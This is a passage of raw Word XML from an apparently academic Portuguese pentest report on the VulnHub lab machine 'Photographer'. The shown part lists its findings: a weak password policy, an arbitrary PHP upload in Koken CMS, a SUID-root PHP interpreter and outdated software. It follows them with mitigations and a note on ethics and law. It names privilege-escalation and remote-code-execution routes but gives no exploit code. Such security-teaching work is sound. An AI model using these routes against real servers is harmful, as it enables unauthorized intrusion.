        <w:t>, de baixa complexidade e divulgada em texto claro em um arquivo de e-mail armazenado em compartilhamento público, violou múltiplos princípios de segurança. A política de senhas do domínio exigia apenas 5 caracteres sem complexidade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB97E36" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Classificação</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP 2025: Identification and Authentication Failures. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Classificação</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE: CWE-521 — Weak Password Requirements. </w:t>
      </w:r>
      <w:r>
        <w:t>Severidade: Alta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232BD3DB" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 CVE-2020-37023 — Upload Arbitrário de Arquivo no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B4FB3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A versão 0.22.24 do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CMS não implementava validação adequada do tipo de arquivo durante o upload de mídia. O servidor aceitava arquivos PHP disfarçados como imagens, permitindo que um usuário autenticado obtivesse execução remota de código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD6962" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Classificação</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP 2025: Security Misconfiguration / Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Classificação</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE: CWE-434 — Unrestricted Upload of File with Dangerous Type. </w:t>
      </w:r>
      <w:r>
        <w:t>CVSS: 8.8 (HIGH). Severidade: Crítica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720A8E6" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>9.4 Bit SUID no Interpretador PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC404B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O binário /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/php7.2 foi configurado com o bit SUID, permitindo que qualquer usuário do sistema executasse código PHP com privilégios de root. Essa configuração não tem justificativa técnica em um servidor de produção e representa um vetor trivial de escalação de privilégios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B54B1" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Classificação OWASP 2025: Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Classificação CWE: CWE-269 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Improper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Privilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Management. Severidade: Crítica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712CBCCD" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>9.5 Software Desatualizado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53EEA5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O servidor utilizava Apache 2.4.18, PHP 7.2.32 e MySQL 5.5.5, versões lançadas entre 2016 e 2017, significativamente desatualizadas em relação ao estado da arte em 2026. Versões antigas de software acumulam vulnerabilidades conhecidas sem patches disponíveis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF7189E" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Classificação</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP 2025: Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Classificação</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE: CWE-1104 — Use of Unmaintained </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Third Party</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Components. </w:t>
      </w:r>
      <w:r>
        <w:t>Severidade: Alta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147835B9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="62B1C941" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>10 ANÁLISE DA TRÍADE CID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982B4A7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10.1 Confidencialidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659560B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A confidencialidade foi comprometida em múltiplos momentos: o compartilhamento SMB anônimo expôs e-mails e arquivos de backup internos; o acesso root permitiu a leitura de qualquer arquivo do sistema, incluindo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de senhas, chaves privadas e dados de configuração do banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46A2A3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 Integridade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA1B5C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A integridade foi comprometida através do upload de arquivos maliciosos no sistema de gerenciamento de conteúdo e pela possibilidade de modificação de qualquer arquivo do sistema após a obtenção de acesso root. Um atacante real poderia ter alterado o conteúdo do site, inserido </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> persistentes ou modificado logs para ocultar o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46587196" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 Disponibilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A672D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A disponibilidade foi potencialmente comprometida: com acesso root, seria trivial encerrar processos críticos, eliminar arquivos de sistema ou executar ataques de negação de serviço interno. Nenhuma ação destrutiva foi executada no contexto deste laboratório, respeitando o escopo ético do exercício.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C250178" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="02B5FD17" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>11 RECOMENDAÇÕES DE MITIGAÇÃO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABAFA14" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 Reconfiguração do Serviço SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121896E1" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O compartilhamento SMB deve ser configurado para exigir autenticação em todos os acessos. A sessão nula deve ser explicitamente desabilitada no arquivo de configuração do Samba (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), adicionando as diretivas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>restrict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>anonymous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 2 e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>never</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Arquivos contendo informações sensíveis, credenciais ou comunicações internas nunca devem ser armazenados em compartilhamentos acessíveis anonimamente. Esta recomendação mitiga a falha classificada como Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460F667" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 Política de Senhas e Autenticação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D99DE5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Deve ser implementada uma política de senhas robusta exigindo no mínimo 12 caracteres, combinando letras maiúsculas, minúsculas, números e símbolos especiais. A autenticação multifator (MFA) deve ser habilitada para todos os painéis administrativos. Senhas nunca devem ser comunicadas em texto claro por e-mail ou armazenadas em arquivos de texto. Esta recomendação mitiga a falha classificada como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Identification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Failures</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058B10D1" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3 Atualização do CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4310E55D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> versão 0.22.24 possui vulnerabilidade de upload arbitrário documentada (CVE-2020-37023). Como o projeto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi descontinuado, recomenda-se a migração para um CMS ativamente mantido, como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Directus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, com atualizações de segurança regulares. Caso a migração não seja imediata, medidas compensatórias devem ser implementadas: desabilitar a execução de PHP no diretório de uploads via configuração do Apache, implementar validação de MIME </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>side</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> com verificação de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>magic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bytes e armazenar uploads fora do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Esta recomendação mitiga a falha classificada como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Outdated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Components</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3BE68A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>11.4 Remoção do Bit SUID de Binários Não Essenciais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67084074" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O bit SUID deve ser removido do interpretador PHP imediatamente, pois não há justificativa operacional para sua presença em um servidor web. O comando para remoção é </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>u-s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/php7.2. Uma auditoria completa de todos os binários com SUID deve ser realizada periodicamente, mantendo apenas aqueles estritamente necessários para o funcionamento do sistema. Recomenda-se a adoção do princípio de menor privilégio (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Least</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Privilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) para todos os processos e serviços. Esta recomendação mitiga a falha classificada como Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D99F3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>11.5 Atualização da Stack de Servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327EA20" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache 2.4.18, PHP 7.2 e MySQL 5.5 são versões sem suporte ativo e acumulam vulnerabilidades conhecidas sem patches disponíveis. A atualização deve ser feita para as versões estáveis mais recentes: Apache 2.4.x atual, PHP </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8.3.x e MySQL 8.0.x ou </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MariaDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 11.x. O processo de atualização deve ser realizado em ambiente de homologação antes da produção, com testes de compatibilidade. Esta recomendação mitiga a falha classificada como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Outdated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Components</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no OWASP Top 10 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DA837" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>11.6 Monitoramento e Detecção</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B109C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Deve ser implementado um sistema de monitoramento de integridade de arquivos (FIM) para detectar modificações não autorizadas em arquivos do servidor web. Logs de acesso HTTP e SMB devem ser centralizados em um SIEM e monitorados em tempo real para detecção de comportamentos anômalos. Alertas devem ser configurados para uploads de arquivos com extensões executáveis e tentativas de acesso a caminhos suspeitos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF90737" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="4F969AF4" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>12 CONSIDERAÇÕES ÉTICAS E LEGAIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3518A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todo o exercício foi realizado em ambiente completamente isolado, sem qualquer conexão com sistemas externos ou redes de produção. A máquina-alvo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> é disponibilizada publicamente pela plataforma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> especificamente para fins educacionais e de prática de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, não representando sistema de terceiros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631BFF3C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O exercício foi autorizado pela instituição de ensino no contexto da disciplina de Cibersegurança, com orientação do professor Renato Junior. Nenhuma técnica destrutiva foi executada: não houve exclusão de dados, alteração de conteúdo ou comprometimento da disponibilidade do sistema-alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B9469" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O profissional de segurança ofensiva deve sempre atuar dentro do escopo autorizado, reportar as vulnerabilidades encontradas às partes responsáveis e nunca explorar sistemas sem autorização expressa. A Lei 14.155/2021, que alterou o Código Penal Brasileiro, tipifica crimes como invasão de dispositivo informático, com pena de reclusão de dois a cinco anos, reforçando a necessidade de autorização formal em todo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
